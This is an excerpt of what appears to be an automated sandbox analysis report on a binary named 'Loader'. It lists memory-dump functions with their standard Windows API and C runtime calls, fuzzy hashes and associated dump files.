                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale
                                                                                                  • String ID:
                                                                                                  • API String ID: 2299586839-0
                                                                                                  • Opcode ID: 4c4ccac41a18569817b82c38daf2dc7674200bc8469825f5e27407df5a1e441b
                                                                                                  • Instruction ID: e77ce6bbf923982a249ec1e9df8fdd1b914560b86e3cd6aa6d56f6349e055487
                                                                                                  • Opcode Fuzzy Hash: 4c4ccac41a18569817b82c38daf2dc7674200bc8469825f5e27407df5a1e441b
                                                                                                  • Instruction Fuzzy Hash: A7E04F7150561CBBCF122F61EC05AAE3E2AEF84751F044420FD5566160CB768D21AFD0
                                                                                                  APIs
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0000FAF0), ref: 0092F9D2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                  • String ID:
                                                                                                  • API String ID: 3192549508-0
                                                                                                  • Opcode ID: ec0381ce1d89af2ac268b4db933774394140d4d4f7b611bd6784b21431d8fa0f
                                                                                                  • Instruction ID: 7a0c71a1c3e609c97550d97770ab8e7860d8d375273be307bba048d1ff7554ce
                                                                                                  • Opcode Fuzzy Hash: ec0381ce1d89af2ac268b4db933774394140d4d4f7b611bd6784b21431d8fa0f
                                                                                                  • Instruction Fuzzy Hash:
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HeapProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 54951025-0
                                                                                                  • Opcode ID: 9d3ba7bee43692267cf03424bee886db0a53dbf0f19d889ec3f66bfb767b1e03
                                                                                                  • Instruction ID: d0a2ac2d95ebbba1702ff59974ec9c9659dc30fd9f0a28c6e6a0a82849f94983
                                                                                                  • Opcode Fuzzy Hash: 9d3ba7bee43692267cf03424bee886db0a53dbf0f19d889ec3f66bfb767b1e03
                                                                                                  • Instruction Fuzzy Hash: 85A0113022A3028B83008F3BAA0820A3AA8AA002C23008028A880C22B0EB308000BF00
                                                                                                  APIs
                                                                                                  • GetCPInfo.KERNEL32(02D5FE18,02D5FE18,00000000,7FFFFFFF,?,0094ABBD,02D5FE18,02D5FE18,00000000,02D5FE18,?,?,?,?,02D5FE18,00000000), ref: 0094AC78
                                                                                                  • __alloca_probe_16.LIBCMT ref: 0094AD33
                                                                                                  • __alloca_probe_16.LIBCMT ref: 0094ADC2
                                                                                                  • __freea.LIBCMT ref: 0094AE0D
                                                                                                  • __freea.LIBCMT ref: 0094AE13
                                                                                                  • __freea.LIBCMT ref: 0094AE49
                                                                                                  • __freea.LIBCMT ref: 0094AE4F
                                                                                                  • __freea.LIBCMT ref: 0094AE5F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __freea$__alloca_probe_16$Info
                                                                                                  • String ID:
                                                                                                  • API String ID: 127012223-0
                                                                                                  • Opcode ID: 696cb4200a5372cecd2a0a7a503a9fe8eba6d3d590d31a6042c12bedcecc6df5
                                                                                                  • Instruction ID: ac16e40c764591f6632fd173378048ae33536e511e4a799889bc2a2b0fe7a947
                                                                                                  • Opcode Fuzzy Hash: 696cb4200a5372cecd2a0a7a503a9fe8eba6d3d590d31a6042c12bedcecc6df5
                                                                                                  • Instruction Fuzzy Hash: 7671457298021AAFDF219F949C81FBF77BD9F88311F290459F954B7282D7359C408BA2
                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 0092FF60
                                                                                                  • __alloca_probe_16.LIBCMT ref: 0092FF8C
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 0092FFCB
                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0092FFE8
                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00930027
                                                                                                  • __alloca_probe_16.LIBCMT ref: 00930044
                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00930086
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 009300A9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                  • String ID:
                                                                                                  • API String ID: 2040435927-0
                                                                                                  • Opcode ID: d39713483e30036d995867c45598871dbb4eb46365247d3705966feb33caba6b
                                                                                                  • Instruction ID: ee999a9ef3234c13e5a853d667ba9e1e81bb5b3c031d827fc850e288f501ae21
                                                                                                  • Opcode Fuzzy Hash: d39713483e30036d995867c45598871dbb4eb46365247d3705966feb33caba6b
                                                                                                  • Instruction Fuzzy Hash: C9519972A0021AAFEB249F61DC55FAB7BB9EF84751F244429F914EA190DB74CC40DFA0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _strrchr
                                                                                                  • String ID:
                                                                                                  • API String ID: 3213747228-0
                                                                                                  • Opcode ID: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
                                                                                                  • Instruction ID: 309372e1b85383027f5ab3e61afc9e9d3cd39e927fa71fceb5061bf3fbab3fd7
                                                                                                  • Opcode Fuzzy Hash: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
                                                                                                  • Instruction Fuzzy Hash: 1BB15672E04355EFDB158FA8CC91BAF7BA9EF59310F144175E814AB282D6749D01CFA0
                                                                                                  APIs
                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00930E67
                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00930E6F
                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00930EF8
                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00930F23
                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00930F78
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                  • String ID: csm
                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                  • Opcode ID: 7a8731da458782571336c5759c5595467186e793ed8ffd180c1bf81cbb553572
                                                                                                  • Instruction ID: dc4f7d723b56022951349d52ed5de25e9776a3fcc1ff5368f708d17582526add
                                                                                                  • Opcode Fuzzy Hash: 7a8731da458782571336c5759c5595467186e793ed8ffd180c1bf81cbb553572
                                                                                                  • Instruction Fuzzy Hash: 7A41C134A002199BCF20EF69C895A9EBBA5EFC4324F148555F9189B392D731EE05CF91
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00930176
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00930184
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00930195
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                  • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                  • API String ID: 667068680-1047828073
                                                                                                  • Opcode ID: 05b0a231592d6d5eb061e52f4506b444e09de8878fef4f775197cd1509362463
                                                                                                  • Instruction ID: 3e2c8d6c8a933c610e6dcb376aa83955c6ed738acd1eaa683c4302c31aeafba7
                                                                                                  • Opcode Fuzzy Hash: 05b0a231592d6d5eb061e52f4506b444e09de8878fef4f775197cd1509362463
                                                                                                  • Instruction Fuzzy Hash: F1D05E7153A320BF8350DF7FFC0D8857A64EB847573420165FD81D3214DB7004849794
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ba502d6ab41cfb992a5367d62578af6bf4762ec459f5b76d13aaf3d7829a7c9b
                                                                                                  • Instruction ID: fcf05ca5ac0fb5d35b8737717aa2b0c51d67ff2ec5dfff3efc36c73c20222655
                                                                                                  • Opcode Fuzzy Hash: ba502d6ab41cfb992a5367d62578af6bf4762ec459f5b76d13aaf3d7829a7c9b
                                                                                                  • Instruction Fuzzy Hash: F7B104B4A08A49EFDB21DFE9C880FAEBBB5AF85344F154158E41197293C7B09941CFA0
                                                                                                  APIs
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00929E37
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00929E48
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00929E5C
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00929E7D
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00929E8E
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00929EA6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Cpp_errorThrow_std::_
                                                                                                  • String ID:
                                                                                                  • API String ID: 2134207285-0
                                                                                                  • Opcode ID: 2a4bf6f0f59a9c0a4573baba9315835f35123cd182a05518b2e58b812665c8b0
                                                                                                  • Instruction ID: f17e8e28457241dcd3823af1869ac1ec060c1508bd3be849648f3fc04e849a5d
                                                                                                  • Opcode Fuzzy Hash: 2a4bf6f0f59a9c0a4573baba9315835f35123cd182a05518b2e58b812665c8b0
                                                                                                  • Instruction Fuzzy Hash: 5841E5B1900720CBDB30DB64A9467AFB7F9BF86320F04062DE57A262DAD7746500CB52
                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32(?,?,0093ADCE,00930850,0092B86F,F84A4DD6,?,?,?,?,0094C0BA,000000FF), ref: 0093ADE5
                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0093ADF3
                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0093AE0C
                                                                                                  • SetLastError.KERNEL32(00000000,?,0093ADCE,00930850,0092B86F,F84A4DD6,?,?,?,?,0094C0BA,000000FF), ref: 0093AE5E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                  • String ID:
                                                                                                  • API String ID: 3852720340-0
                                                                                                  • Opcode ID: 7c8b94cf269bdb9df1fabcf8eaeebc6319b99961fd23038e634b4c7d92cf3412
                                                                                                  • Instruction ID: a04c1bb0995379b5b4429e794afa58314dc0ed7ec469f782a2ac2215635715ee
                                                                                                  • Opcode Fuzzy Hash: 7c8b94cf269bdb9df1fabcf8eaeebc6319b99961fd23038e634b4c7d92cf3412
                                                                                                  • Instruction Fuzzy Hash: 8201AC7711D7159DE73427B6BC95E2B27E8DB53B76B20032AF660450E1EF618C026B42
                                                                                                  APIs
                                                                                                  • type_info::operator==.LIBVCRUNTIME ref: 0093B77D
                                                                                                  • CallUnexpected.LIBVCRUNTIME ref: 0093B9F6
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CallUnexpectedtype_info::operator==
                                                                                                  • String ID: csm$csm$csm
                                                                                                  • API String ID: 2673424686-393685449
                                                                                                  • Opcode ID: 345252596ea44100ed5e1b81ac48c107f7951c814e8046a5b5730fd9cc3dbd9f
                                                                                                  • Instruction ID: f469aad745b3960b36961a0ddc208c05e085dde2a27ee1ecc847c20d0cb87aff
                                                                                                  • Opcode Fuzzy Hash: 345252596ea44100ed5e1b81ac48c107f7951c814e8046a5b5730fd9cc3dbd9f
                                                                                                  • Instruction Fuzzy Hash: 35B1CC75800209EFCF18DFA4C881AAEBBB9FF84315F10455AFA15AB216D734DA51CF92
                                                                                                  APIs
                                                                                                  • std::_Ref_count_base::_Decref.LIBCPMT ref: 0092C034
                                                                                                  • std::_Ref_count_base::_Decref.LIBCPMT ref: 0092C118
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DecrefRef_count_base::_std::_
                                                                                                  • String ID: MOC$RCC$csm
                                                                                                  • API String ID: 1456557076-2671469338
                                                                                                  • Opcode ID: aeecd84eb6bf6b099eacd9a4362767e9223001c1437dc46b1cdb10d92c4d6b45
                                                                                                  • Instruction ID: 99a43db571bcf86c6fffa31daeb98139f0cd99a62ab6ca2b7cf4aa77657b3384
                                                                                                  • Opcode Fuzzy Hash: aeecd84eb6bf6b099eacd9a4362767e9223001c1437dc46b1cdb10d92c4d6b45
                                                                                                  • Instruction Fuzzy Hash: 8241BAB5800214DFCF24EF68E545AAEB7F9AF88300F58806EE445A7256C734AA44CB51
                                                                                                  APIs
                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,F84A4DD6,?,?,00000000,0094BF84,000000FF,?,00935775,00000002,?,00935811,00938486), ref: 009356E9
                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 009356FB
                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,0094BF84,000000FF,?,00935775,00000002,?,00935811,00938486), ref: 0093571D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                  • Opcode ID: 83969f3a92913ea3967f170b0d581d26a87ebd5a2dfda738a7e1c8882eadca6f
                                                                                                  • Instruction ID: 098dcab3eb51cd47c21b0a3688c060c76b7316d1dfeed41f468e80aa48f010c4
                                                                                                  • Opcode Fuzzy Hash: 83969f3a92913ea3967f170b0d581d26a87ebd5a2dfda738a7e1c8882eadca6f
                                                                                                  • Instruction Fuzzy Hash: 8E01A231964719EFDB01CF55CC05BAEB7B8FB48B1AF010525F852A2290DB759900CB90
                                                                                                  APIs
                                                                                                  • __alloca_probe_16.LIBCMT ref: 0093D85F
                                                                                                  • __alloca_probe_16.LIBCMT ref: 0093D928
                                                                                                  • __freea.LIBCMT ref: 0093D98F
                                                                                                    • Part of subcall function 0093C001: RtlAllocateHeap.NTDLL(00000000,0093E025,?,?,0093E025,00000220,?,00000000,?), ref: 0093C033
                                                                                                  • __freea.LIBCMT ref: 0093D9A2
                                                                                                  • __freea.LIBCMT ref: 0093D9AF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
